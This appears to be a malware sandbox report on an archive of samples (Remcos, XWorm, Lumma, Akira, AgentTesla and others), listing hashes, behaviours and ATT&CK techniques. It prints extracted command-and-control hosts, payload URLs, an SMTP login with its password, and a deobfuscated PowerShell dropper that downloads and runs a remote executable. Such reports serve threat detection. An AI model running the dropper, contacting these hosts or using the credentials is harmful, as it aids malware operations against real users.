Overview

overview

10

Static

static

10

Files/0018...8a.exe

windows7-x64

10

Files/0018...8a.exe

windows10-2004-x64

10

$PLUGINSDI...em.dll

windows7-x64

3

$PLUGINSDI...em.dll

windows10-2004-x64

3

Files/059c...6b.exe

windows7-x64

3

Files/059c...6b.exe

windows10-2004-x64

3

Files/0761...50.exe

windows7-x64

5

Files/0761...50.exe

windows10-2004-x64

5

Files/0b4a...e6.exe

windows7-x64

10

Files/0b4a...e6.exe

windows10-2004-x64

10

Files/0c10...54.rtf

windows7-x64

8

Files/0c10...54.rtf

windows10-2004-x64

1

Files/0dc6...d8.exe

windows7-x64

7

Files/0dc6...d8.exe

windows10-2004-x64

7

Files/0def...d1.exe

windows7-x64

5

Files/0def...d1.exe

windows10-2004-x64

7

Files/0f64...5d.exe

windows7-x64

10

Files/0f64...5d.exe

windows10-2004-x64

10

Files/0fe5...05.exe

windows7-x64

10

Files/0fe5...05.exe

windows10-2004-x64

10

Files/1150...16.exe

windows7-x64

8

Files/1150...16.exe

windows10-2004-x64

10

Files/11c8...ba.exe

windows7-x64

10

Files/11c8...ba.exe

windows10-2004-x64

10

Files/15e3...5e.exe

windows7-x64

8

Files/15e3...5e.exe

windows10-2004-x64

8

Files/1ca4...74.exe

windows7-x64

10

Files/1ca4...74.exe

windows10-2004-x64

10

Files/1dc7...d8.exe

windows7-x64

5

Files/1dc7...d8.exe

windows10-2004-x64

5

Files/1fb0...c1.exe

windows7-x64

3

Files/1fb0...c1.exe

windows10-2004-x64

3

Sharing

Copy URL
Twitter E-mail

General

  • Target

    bb80103ac259b0a260fe3fabea6c6ceedf4286f43b24665a9ec30bc1b19bd267

  • Size

    108.7MB

  • Sample

    250328-f2c35stqw8

  • MD5

    541b119f806c80a252c746042bf464ad

  • SHA1

    c9fcbbc03d26a428a412f80e2fe97f25853856cf

  • SHA256

    bb80103ac259b0a260fe3fabea6c6ceedf4286f43b24665a9ec30bc1b19bd267

  • SHA512

    d8bdd55d3021296e9e1688770bc27da0a88d0a36d8f2cac3f469244bd71af6a5a36173fb076376952ad839ecd71d12565bf3e88aa734ce49a3f7bc8195155a5e

  • SSDEEP

    1572864:silUaHZSbqW7IJZ5Q9dWZGoLIP95bARN031ZzlDnFVs9eb8chagiu1Xw+SdBJIpf:sOEzwZ5QlLPfARNAZzlDdosV1Xw+S2f

Score
10/10
agentteslaakiraguloaderlummanjratquasarremcosstormkittyxredxwormremotehostruntimebroker.exetelegramcollectiondiscoverydownloaderdropperexecutionkeyloggerpersistenceransomwareransowmwareratspywarestealertrojanupx

Malware Config

Extracted

Family

quasar

Version

1.3.0.0

Botnet

TELEGRAM

C2

212.56.35.232:101

Mutex

QSR_MUTEX_LoEArEgGuZRG2bQs0E

Attributes
  • encryption_key

    yMvSAv7B2dURg67QYU5x

  • install_name

    svchost.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    svchosta

  • subdirectory

    media

Extracted

Family

njrat

Version

0.7d

Botnet

RuntimeBroker.exe

C2

hakim32.ddns.net:2000

morning-ultimately.gl.at.ply.gg:14531
Mutex

a7508ccd4c60e6eaa0eb204481c3a0be

Attributes
  • reg_key

    a7508ccd4c60e6eaa0eb204481c3a0be

  • splitter

    |'|'|

Extracted

Family

xred

C2

xred.mooo.com

Attributes
  • email

    xredline1@gmail.com

  • payload_url

    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

    http://xred.site50.net/syn/SUpdate.ini

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

    https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

    http://xred.site50.net/syn/Synaptics.rar

    https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

    http://xred.site50.net/syn/SSLLibrary.dll

Extracted

Family

xworm

C2

language-lose.gl.at.ply.gg:64760

park-meetup.gl.at.ply.gg:62592

z-openings.gl.at.ply.gg:40705

remember-gene.gl.at.ply.gg:9389
Attributes
  • Install_directory

    %Temp%

  • install_file

    checker.exe

Extracted

Language
ps1
Deobfuscated
1
$dguetbwq0k = new-object system.net.webclient
2
$wawglcjmem = "http://92.255.85.2/Fox.exe"
3
$r9u3at = $dguetbwq0k.downloaddata("http://92.255.85.2/Fox.exe")
4
$vcfrtz = [system.reflection.assembly]::load($r9u3at)
5
$twvcaa = $vcfrtz.entrypoint
6
$twvcaa.invoke($null, @())
7
URLs
ps1.dropper

http://92.255.85.2/Fox.exe
exe.dropper

http://92.255.85.2/Fox.exe

Extracted

Family

xworm

Version

5.0

C2

year-tim.gl.at.ply.gg:24149

142.147.96.74:7000

buinhatduy01.ddns.net:7000

buinhatduy.duckdns.org:7000
Mutex

2kICHr7gSrOzPXii

Attributes
  • Install_directory

    %Temp%

  • install_file

    jusched.exe

aes.plain
1
MCNmdWA32BXEW4Ul73bmwA==
aes.plain
1
y6NBaLuaGhr4aOhUzfBwfg==

Extracted

Family

remcos

Botnet

RemoteHost

C2

127.0.0.1:2404

196.251.80.28:2404
Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    true

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-4U257D

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Extracted

Family

lumma

C2

https://sordid-snaked.cyou/api

https://awake-weaves.cyou/api

https://wrathful-jammy.cyou/api

https://debonairnukk.xyz/api

https://diffuculttan.xyz/api

https://effecterectz.xyz/api

https://deafeninggeh.biz/api

https://immureprech.biz/api

https://bellflamre.click/api

Extracted

Family

agenttesla

Credentials

  • Protocol:     smtp
  • Host:
    mail.worlorderbillions.top
  • Port:
    587
  • Username:
    agumoney@worlorderbillions.top
  • Password:
    QBD{3zf.F+2F
  • Email To:
    agumoney@worlorderbillions.top

Targets

    • Target

      Files/0018f4feb99c7f12c3f5bfe53998c3c6ca7e2908f666f44a93f914c8c41c588a.exe

    • Size

      988KB

    • MD5

      f88d5cdc31b3c12a7229e96282dfeab2

    • SHA1

      dd00a7281c5398b8db7a7a1f2f5168cb9eed4201

    • SHA256

      0018f4feb99c7f12c3f5bfe53998c3c6ca7e2908f666f44a93f914c8c41c588a

    • SHA512

      7969dcb95cb1f0e5ed15ebee31cc396186f874b80edb3a91b77b89a42f04080627d74db7455a2ba9d9732b1343b9729ee7f34e05282782fbdd6098748f5c19ce

    • SSDEEP

      24576:rkhXHlJvh3QVsBNxJdN5dN+PMjyFOO8n/ebLPNB0AP:rq7phNJld0PMjyIx/ebLb02

    Score
    10/10
    guloaderremcosremotehostdiscoverydownloaderpersistencerat

    • Guloader family

      guloader

    • Guloader,Cloudeye

      A shellcode based downloader first seen in 2020.

      downloaderguloader

    • Remcos

      Remcos is a closed-source remote control and surveillance software.

      ratremcos

    • Remcos family

      remcos

    • Boot or Logon Autostart Execution: Active Setup

      Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

      persistence

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

      persistence

    • Legitimate hosting services abused for malware hosting/C2

    • Suspicious use of NtCreateThreadExHideFromDebugger

    • Suspicious use of NtSetInformationThreadHideFromDebugger

    behavioral1behavioral2

    • Target

      $PLUGINSDIR/System.dll

    • Size

      11KB

    • MD5

      ee260c45e97b62a5e42f17460d406068

    • SHA1

      df35f6300a03c4d3d3bd69752574426296b78695

    • SHA256

      e94a1f7bcd7e0d532b660d0af468eb3321536c3efdca265e61f9ec174b1aef27

    • SHA512

      a98f350d17c9057f33e5847462a87d59cbf2aaeda7f6299b0d49bb455e484ce4660c12d2eb8c4a0d21df523e729222bbd6c820bf25b081bc7478152515b414b3

    • SSDEEP

      192:eF24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol9Sl:h8QIl975eXqlWBrz7YLOl9

    Score
    3/10
    discovery
    behavioral3behavioral4

    • Target

      Files/059cf78adefc07c8225fde4b20f705dfed5c8c90f0d360b84d941c432b99f76b.exe

    • Size

      8.8MB

    • MD5

      6639f9f1bfbd89757f7b6dc824a9d35c

    • SHA1

      a51f99fb2b7b84500f717d2c7628cc882756efd3

    • SHA256

      059cf78adefc07c8225fde4b20f705dfed5c8c90f0d360b84d941c432b99f76b

    • SHA512

      23827b56c284d89c93da5f5570fdb590a47b711f4fb091a0d6585e13e6f1d928d785bfa612dfdcd669cc69ce8d1448abccabea18b5e3fcc3542d8242106cb81f

    • SSDEEP

      196608:Nd5KKE1LoDteQFKVcmQnQnmGOW6La6NLh2UQyI1DS:v5Kz1Lu0tnzF6Laql2U5I1

    Score
    3/10
    discovery
    behavioral5behavioral6

    • Target

      Files/07610c4fda6b5d6e8920d8da44a58213ef6c4309c794978477e81ed50f885150.exe

    • Size

      1.1MB

    • MD5

      d444a977328b0f1b5e792a794ccd9fd0

    • SHA1

      32a67b71ebb303ee25928a1eb76c548d384589b8

    • SHA256

      07610c4fda6b5d6e8920d8da44a58213ef6c4309c794978477e81ed50f885150

    • SHA512

      d71d6e38ab5a6b0bfead3f288f4202550a46991b02fda710c026248de66fe8b4d5ae7767018671413deee3d3a92a3a5934be1a95ff1e3909fecdb9b7cb0ec9e7

    • SSDEEP

      24576:ru6J33O0c+JY5UZ+XC0kGso6FajYuNaeNAymutbrfYJfIcWY:Fu0c++OCvkGs9FajYulNZvJUfiY

    Score
    5/10
    discovery

    • Suspicious use of SetThreadContext

    behavioral7behavioral8

    • Target

      Files/0b4a12968bf32f01c3aacc96ab4888e8b04f4ff334f903968afe452fec9bb2e6.exe

    • Size

      1.8MB

    • MD5

      c53d0c64f18101045e5728562404a09b

    • SHA1

      ebec00d5f2675c883038bc149af1da8d7b0cf535

    • SHA256

      0b4a12968bf32f01c3aacc96ab4888e8b04f4ff334f903968afe452fec9bb2e6

    • SHA512

      bdd8080dd0b17514ede52419b755cf324e2a46b2cbb38f504d008e3bf791ef7c6a3cb78cb4f4f51f875e7677dd034750022b41074dc04b1922242fd8f339a2a7

    • SSDEEP

      24576:xbX9r1C3TEukAYhjKVTvC/7f0Of8t2WVP3bw8izhWGsi2:ThEvC/7fhyPrwPzhWGZ

    Score
    10/10
    xwormdiscoverypersistencerattrojan

    • Detect Xworm Payload

    • Xworm

      Xworm is a remote access trojan written in C#.

      trojanratxworm

    • Xworm family

      xworm

    • Boot or Logon Autostart Execution: Active Setup

      Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

      persistence

    • Executes dropped EXE

    • Adds Run key to start application

      persistence

    • Suspicious use of SetThreadContext

    behavioral10behavioral9

    • Target

      Files/0c10532495658ae6099011796249e76b9ef33235a019df54086bd07547685354.doc

    • Size

      600KB

    • MD5

      62d9f219d4c67d21a6a125597804821b

    • SHA1

      48a46d13ff5571ba085cbd4b9f6575a400199d24

    • SHA256

      0c10532495658ae6099011796249e76b9ef33235a019df54086bd07547685354

    • SHA512

      3296f44e94c842d970de96ccb1c4dc41516f4e7aecd4b5dc22ebfa50238c1f853a169fb90bbfbc8eece44b047987a4bc765f63c263b93deac2eb4162bf274b44

    • SSDEEP

      6144:KwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAE:j

    Score
    8/10
    discovery

    • Blocklisted process makes network request

    behavioral11behavioral12

    • Target

      Files/0dc6fa2e838c3b03b801833f45d683b0cb27a787aa533e652e449f0456871cd8.exe

    • Size

      956KB

    • MD5

      f0d052d7ce93b6649e0c73e967f32750

    • SHA1

      d83e9314d00948f5e3664b9ad67cd17200a0de9a

    • SHA256

      0dc6fa2e838c3b03b801833f45d683b0cb27a787aa533e652e449f0456871cd8

    • SHA512

      98691ac24e8d8dfaf561adca0a28a4da99a699cd68522870ec3e99888f176a10d39fe93feacdae8ab98ee1448c1e22b28a5ff81cb79f28cf642f0166b2918476

    • SSDEEP

      24576:5u6J33O0c+JY5UZ+XC0kGso6Fafx4pbWJWY:7u0c++OCvkGs9FafxgrY

    Score
    7/10
    collectiondiscovery

    • Drops startup file

    • Executes dropped EXE

    • Loads dropped DLL

    • Accesses Microsoft Outlook profiles

      collection

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • AutoIT Executable

      AutoIT scripts compiled to PE executables.

    • Suspicious use of SetThreadContext

    behavioral13behavioral14

    • Target

      Files/0def0868347c89485ceb5386573bce41ed3a83b343adc3308441f7822988c7d1.exe

    • Size

      567KB

    • MD5

      264c28f35244da45b779e4ead9c6c399

    • SHA1

      f57631c3bec9e05605dfdcf826a63657777d09f3

    • SHA256

      0def0868347c89485ceb5386573bce41ed3a83b343adc3308441f7822988c7d1

    • SHA512

      7d9a11453ea447fb36b20ae289135685468e415a520217f16b4c91cf55fa1afc378c4c3e0e1c0057de3f093dbf53baba5d0bc0e6549534f6e04d5da92d736b40

    • SSDEEP

      12288:XT5jLj8eLkXoW+zlyqPVrJ6TPoqy/j1cLLYCQ51mm4poOcmMp+FoyQZiVo:j5jLjSXoVpysVV6TPzy/jGLm51mm8ym8

    Score
    7/10
    discoveryexecutionpersistencespywarestealer

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

      spywarestealer

    • Adds Run key to start application

      persistence

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext

    behavioral15behavioral16

    • Target

      Files/0f6481dabf7871823f259eb95f3b85c37d1de8a7d1884ac77a97d887cf96f75d.exe

    • Size

      393KB

    • MD5

      3c4161be295e9e9d019ce68dae82d60a

    • SHA1

      36447fc6418e209dff1bb8a5e576f4d46e3b3296

    • SHA256

      0f6481dabf7871823f259eb95f3b85c37d1de8a7d1884ac77a97d887cf96f75d

    • SHA512

      cfa2d491a5d28beb8eb908d5af61254ac4c4c88e74c53d5d00ae15ef0731df1654304199996545d1074814c0ea8a032957b28d70774f05347616428e667f70e6

    • SSDEEP

      12288:ndoOphZgRZGJZzu/aeZjl5FeBTCVpgTfR:ndl/QZGTuHhjFe1C3gt

    Score
    10/10
    lummadiscoverystealer

    • Lumma Stealer, LummaC

      Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

      stealerlumma

    • Lumma family

      lumma

    • Suspicious use of SetThreadContext

    behavioral17behavioral18

    • Target

      Files/0fe572e7aad25a38ba9ee9b4600ddc02641e29061de250c525d6828f70326005.exe

    • Size

      1.0MB

    • MD5

      d37594e06b180d71d1612e6fd61e02a2

    • SHA1

      d9d8836f5ed53513401b379d5806501d5b1e000a

    • SHA256

      0fe572e7aad25a38ba9ee9b4600ddc02641e29061de250c525d6828f70326005

    • SHA512

      a2f4bbe84a0d78897604eaf10c18581c0676f23a15e7ab8b95b80d1f84898a49a4132aecb194631d2df4f0c5616d4d2c85959af27fbbfb65f257773b6ebbde29

    • SSDEEP

      12288:nLXeXuANMx17cMW50NY3RuKI5B/N++PP8fACq6EBvxz:LXcuA4cMW50kuKI5B/pP8fACHE

    Score
    10/10
    akiraexecutionransomwareransowmwarespywarestealer

    • Akira

      Akira is a ransomware first seen in March 2023 and targets several industries, including education, finance, real estate, manufacturing, and consulting.

      ransomwareakira

    • Akira family

      akira

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Renames multiple (8643) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

      ransomware

    • Command and Scripting Interpreter: PowerShell

      Run Powershell command to delete shadowcopy.

      executionransowmware

    • Drops startup file

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

      spywarestealer

    • Drops desktop.ini file(s)

    • Drops file in System32 directory

    behavioral19behavioral20

    • Target

      Files/115059fe4fc5402a68c1e19acec336dd7cb180ef5433510d715d54e495e04316.exe

    • Size

      106KB

    • MD5

      af96147082306e597383ea83924d92ec

    • SHA1

      2e092326740df77598ac3cb2898ae6adfb9f100f

    • SHA256

      115059fe4fc5402a68c1e19acec336dd7cb180ef5433510d715d54e495e04316

    • SHA512

      b141e8eab204af1cff7d460974b04bf51cef24e70b7537f76862f6f633aa1eefb8fdbbb8ec9d7cb6dab0e97244eff560bdcc785bf64a253c40cb3c42c84bc7db

    • SSDEEP

      3072:+fWi4MdM81BorInbhk9H+ZifSKf+nbGOD5zMQUM:+z4MdM8for0iSKgNIQ

    Score
    10/10
    discoverydropperstormkittyxwormexecutionpersistenceratstealertrojan

    • Detect Xworm Payload

    • StormKitty

      StormKitty is an open source info stealer written in C#.

      stealerstormkitty

    • StormKitty payload

    • Stormkitty family

      stormkitty

    • Xworm

      Xworm is a remote access trojan written in C#.

      trojanratxworm

    • Xworm family

      xworm

    • Command and Scripting Interpreter: PowerShell

      Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

      execution

    • Download via BitsAdmin

      dropper

    • Downloads MZ/PE file

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Drops startup file

    • Executes dropped EXE

    • Adds Run key to start application

      persistence

    • Legitimate hosting services abused for malware hosting/C2

    behavioral21behavioral22

    • Target

      Files/11c893b8175b916691afb56498a2a35c4fcf038a5f418e3ae7db3c66049abeba.exe

    • Size

      1.1MB

    • MD5

      dcf203f978212ab5254735b47faf5b31

    • SHA1

      1c2bcd70c16274e52f0cfce9c0d2c4853889e8c1

    • SHA256

      11c893b8175b916691afb56498a2a35c4fcf038a5f418e3ae7db3c66049abeba

    • SHA512

      4b9bf7793a86a698c6a8dae36a11b9353ed8eeee4e2b14d6ac95523cc31401e3ecc4f2ba029970a471e84a83072036c8fa8992ff6818bc1b002b87980225e5a0

    • SSDEEP

      24576:Hu6J33O0c+JY5UZ+XC0kGso6Fa4cdgyvtInxcO3I8GvWY:Bu0c++OCvkGs9Fa5dpVsOOYOY

    Score
    10/10
    agenttesladiscoverykeyloggerspywarestealertrojan
    behavioral23behavioral24

    • Target

      Files/15e3d2f2ae29c63206f13aa1768289a830ac2ef71c83227e3bc61a634ad7b05e.exe

    • Size

      681KB

    • MD5

      c6a8c3eb7aac9d6bc575c07b15fa9184

    • SHA1

      e9017cd563cc0a706cdf37a8671bc2a0c9d2bc9c

    • SHA256

      15e3d2f2ae29c63206f13aa1768289a830ac2ef71c83227e3bc61a634ad7b05e

    • SHA512

      a55d0d3e51e23a32820a9034e6a3f799abafd7217c3b41054c63befc83eeca3d39519d8507d3976b199c1d924687d4c6410ae1055ffd9576fd5b53dee9a394e4

    • SSDEEP

      12288:HGwK7tzJ+Wnqn++Kkchq1uHEEWTIrqZgFfIyJKop37VrOFDDN/mrFUezlndhv43n:dKzMskchVHEEJdKopBwDN

    Score
    8/10
    collectiondiscoveryexecutionspywarestealer

    • Command and Scripting Interpreter: PowerShell

      Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

      execution

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Reads user/profile data of local email clients

      Email clients store some user data on disk where infostealers will often target it.

      spywarestealer

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

      spywarestealer

    • Accesses Microsoft Outlook profiles

      collection

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext

    behavioral25behavioral26

    • Target

      Files/1ca4a73b1076d2c6c0b97b3544919281b091e260f4970f62ae7f1cbcb9cc5e74.exe

    • Size

      2.5MB

    • MD5

      a6506ab7846f51acccb092a6164c7677

    • SHA1

      12a675e6434764b98335440220864bdffeb6cbfc

    • SHA256

      1ca4a73b1076d2c6c0b97b3544919281b091e260f4970f62ae7f1cbcb9cc5e74

    • SHA512

      44d5c49b54011fed4332ab08375031543108b286a21768b35bd8bfab02cdb413b53cc1bc8e98c554008e9ca9d4ca9a92c03beab01db9a40e87908054b3dd9612

    • SSDEEP

      49152:ZZPjorfOAfRxx13BIq8IYpSqxN7XGQKoBaJ3RIrMQJZipKE1:ZZkzD73i7pSqxNV5wQJwd1

    Score
    10/10
    xwormrattrojan

    • Detect Xworm Payload

    • Xworm

      Xworm is a remote access trojan written in C#.

      trojanratxworm

    • Xworm family

      xworm

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Loads dropped DLL

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    behavioral27behavioral28

    • Target

      Files/1dc75c16bf526f435cbdf05c73df57040791b7809d64e158b0b66565e444b3d8.exe

    • Size

      121KB

    • MD5

      cfb23e22eacdf2343fc0f792b49b55c9

    • SHA1

      5bb717295c8bd95f81b840257b39e0957e967e5a

    • SHA256

      1dc75c16bf526f435cbdf05c73df57040791b7809d64e158b0b66565e444b3d8

    • SHA512

      c283d7c9f175f5ca8215ae394bf1938e80feb8e0e50e280ce0903f4fe59560553ac32ca28924f84430d889ef19c44a0db88cc3e74750bfbbd2fbb0209ef2fbf7

    • SSDEEP

      3072:PrYgvm0rkfpICpDsZipXW7SSJz6OFHO8UnXRZrZG:PEgvm0gpGgXuJdJAB

    Score
    5/10
    upxdiscovery

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

      upx
    behavioral29behavioral30

    • Target

      Files/1fb08d6dc54e057419e21ca6c5aa959c2f9833eebd6e8998843a737c009de5c1.exe

    • Size

      97KB

    • MD5

      86faa03faca5764b65096940604a1390

    • SHA1

      f0e183789ae06266195cbe11200e830c011388b4

    • SHA256

      1fb08d6dc54e057419e21ca6c5aa959c2f9833eebd6e8998843a737c009de5c1

    • SHA512

      8366618f8595456ec5a839994b5bf3f0d80345b18f63313a3d191124a2835f3b6ec3a4067503d0ffe14d8e6ad0209c1eb597e6f753c0a82263b3edf9214f56ab

    • SSDEEP

      1536:j7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfVwWq8X4NoOj:/7DhdC6kzWypvaQ0FxyNTBfVnq8y

    Score
    3/10
    discovery
    behavioral31behavioral32

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

3
T1059

PowerShell

3
T1059.001

Exploitation for Client Execution

1
T1203

Scheduled Task/Job

1
T1053

Scheduled Task

1
T1053.005

Persistence

BITS Jobs

1
T1197

Boot or Logon Autostart Execution

2
T1547

Active Setup

1
T1547.014

Registry Run Keys / Startup Folder

1
T1547.001

Scheduled Task/Job

1
T1053

Scheduled Task

1
T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

2
T1547

Active Setup

1
T1547.014

Registry Run Keys / Startup Folder

1
T1547.001

Scheduled Task/Job

1
T1053

Scheduled Task

1
T1053.005

Defense Evasion

BITS Jobs

1
T1197

Modify Registry

3
T1112

Credential Access

Credentials from Password Stores

1
T1555

Credentials from Web Browsers

1
T1555.003

Unsecured Credentials

2
T1552

Credentials In Files

2
T1552.001

Discovery

Browser Information Discovery

1
T1217

Query Registry

4
T1012

System Information Discovery

4
T1082

System Location Discovery

1
T1614

System Language Discovery

1
T1614.001

Lateral Movement

Collection

Data from Local System

2
T1005

Email Collection

1
T1114

Command and Control

Web Service

1
T1102

Exfiltration

Impact

Tasks

static1

upxtelegramruntimebroker.exequasarnjratxredxworm
Score
10/10

behavioral1

guloaderremcosremotehostdiscoverydownloaderpersistencerat
Score
10/10

behavioral2

guloaderremcosremotehostdiscoverydownloaderpersistencerat
Score
10/10

behavioral3

discovery
Score
3/10

behavioral4

discovery
Score
3/10

behavioral5

discovery
Score
3/10

behavioral6

discovery
Score
3/10

behavioral7

discovery
Score
5/10

behavioral8

discovery
Score
5/10

behavioral9

xwormdiscoverypersistencerattrojan
Score
10/10

behavioral10

xwormdiscoverypersistencerattrojan
Score
10/10

behavioral11

discovery
Score
8/10

behavioral12

Score
1/10

behavioral13

collectiondiscovery
Score
7/10

behavioral14

collectiondiscovery
Score
7/10

behavioral15

discoveryexecution
Score
5/10

behavioral16

discoveryexecutionpersistencespywarestealer
Score
7/10

behavioral17

lummadiscoverystealer
Score
10/10

behavioral18

lummadiscoverystealer
Score
10/10

behavioral19

akiraexecutionransomwareransowmwarespywarestealer
Score
10/10

behavioral20

akiraexecutionransomwareransowmwarespywarestealer
Score
10/10

behavioral21

discoverydropper
Score
8/10

behavioral22

stormkittyxwormdiscoverydropperexecutionpersistenceratstealertrojan
Score
10/10

behavioral23

agenttesladiscoverykeyloggerspywarestealertrojan
Score
10/10

behavioral24

agenttesladiscoverykeyloggerspywarestealertrojan
Score
10/10

behavioral25

collectiondiscoveryexecutionspywarestealer
Score
8/10

behavioral26

collectiondiscoveryexecutionspywarestealer
Score
8/10

behavioral27

xwormrattrojan
Score
10/10

behavioral28

xwormrattrojan
Score
10/10

behavioral29

upx
Score
5/10

behavioral30

discoveryupx
Score
5/10

behavioral31

discovery
Score
3/10

behavioral32

discovery
Score
3/10

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.